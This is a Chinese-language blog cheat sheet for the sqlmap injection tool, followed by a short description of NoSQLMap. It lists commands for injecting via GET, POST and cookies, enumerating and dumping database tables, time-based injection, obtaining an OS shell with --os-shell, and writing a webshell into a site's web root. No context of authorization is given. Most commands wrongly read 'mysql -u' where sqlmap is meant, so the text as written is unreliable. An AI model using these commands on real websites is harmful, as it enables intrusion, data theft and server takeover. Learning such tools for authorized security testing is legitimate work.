sqlmap初级

1 三种方式

get、post、cookie

get

mysql -u "url"

post

mysql -u "url" --data "username=ly"
mysql -u "url" --cookie "a=cookie_a"

2 获取当前数据库、用户、权限、数据量

数据库

mysql -u "url" --current-db

用户

mysql -u "url" --current-user

权限

mysql -u "url" --privileges

或查看用户后,若是sa(SQL server)或root(mysql)则为最高权限

数据量

mysql -u "url" --count -D "数据库"

3 注入

mysql -u "url" --current-db
mysql -u "url" --tables -D "数据库名"
mysql -u "url" --columns -T "表名" -D "数据库名"
mysql -u "url" -C “列名” -T "表名" -D "数据库名" --dump

Access只有一个数据库,因此可略过步骤一
对于nosql数据库:nosqlmap

4 管理自己的数据库

需要装一个pymysql

sqlmap -d "mysql://username:pwd@ip:port/db" --sql-shell

5 延时注入

页面无报错时使用。下面两个都可以

mysql -u "url" --delay 延迟秒数
mysql -u "url" -safe-freq

6 交互式命令执行和写webshell

mysql -u "url"  --os-cmd=命令
mysql -u "url"  --os-shell

7 本地写入webshell

要求最高权限,现在本地sqlmap下新建mst目录,加入文件

mysql -u "url" --file-write "./mst/mst.txt" --file-dest "d:/www/1.html"

8 批量注入

sqlmap -m a.txt

结合burp suit代理:先配置burp suit的project options的logging,选中proxy的request,保存为.log

sqlmap -l a.log --batch --smart

9 学习注入

1 学习sqlmap/payload/xml文件
2 -v 3
3 结合burp suit,--proxy "127.0.0.1:8080"

10 tamper

--tamper ""
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NoSQLMap是一款开源Python工具,可以帮助安全测试人员自动化对NoSQL数据库进行攻击测试。目前这款工具的漏洞利用程序围绕MongoDB,但是以后会支持更多的NoSQL数据库,如 CouchDB, Redis和Cassandra。NoSQLMap是一款Python编写的开源工具,常用于审计NoSQL数据库中的自动注入攻击、为了从数据库中揭露数据而利用NoSQL数据库或使用NoSQL的Web应用的默认配置弱点。它这样命名是为了几年Bernardo Damele和Miroslav创作的流行的SQL工具SQLmap,它的设计理念来源于Ming Chow在Defcon中发表的很棒的演讲-”Abusing NoSQL Databases”。该工具目前主要应用于MongoDB,但是它在未来的版本中还会支持其他基于NoSQL的平台,如CouchDB, Redis和Cassandra等。当前该项目的目的是为简单攻击MongoDB服务器和一些web应用提供渗透测试工具,以及用通过概念攻击来证明某NoSQL应用不会受到SQL注入。主要功能:自动化MongoDB和CouchDB数据库枚举和克隆攻击。通过MongoDB web应用提取数据库名称、用户和哈希密码。为使用默认访问和枚举版本的MongoDB和CouchDB数据库扫描子网或IP列表。字典攻击、暴力破解恢复的MongoDB和CouchDB的哈希密码。针对MongoClient的PHP应用程序参数注入攻击,返回所有数据库中的记录。Javascript函数变量转移和任意代码注入,返回所有数据库中的记录。类似于盲SQL注入的用于验证无来自应用程序的反馈的Javascript注入漏洞的时序攻击。使用方法启动./nosqlmap.py或python nosqlmap.py.基本菜单1-Set options (do this first) 2-NoSQL DB Access Attacks 3-NoSQL Web App attacks 4-Exit 标签:NoSQLMap

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值